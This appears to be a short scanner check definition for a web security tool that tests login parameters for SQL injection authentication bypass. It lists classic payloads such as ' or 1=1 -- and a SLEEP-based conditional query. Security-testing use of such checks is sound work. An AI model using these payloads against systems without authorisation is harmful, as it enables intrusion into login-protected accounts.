metadata:
    language: v2-beta
    name: "Bypass login SQLi Checker"
    description: "Bypass authentication SQLi"
    author: "nu11secur1ty"

run for each:
    payloadSet =
        "'",
        "' or 1=1 --",
        "' or 1=1 --+",
        "SELECT * FROM users WHERE username = '' OR 1=1--",
        "foo'",
        "SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')",
        "nu11secur1ty' or 1=1#"
        

given query insertion point then
    send payload called check:
        appending: {payloadSet}

    if {check} differs from {base} then
        report issue:
            severity: high
            confidence: certain
            detail: "Found a vulnerable post parameter that got SQLi bypass authentication vulnerability.
                     The payload (') was submitted in a POST + GET request. You must test manually to confirm this vulnerability!"
    end if
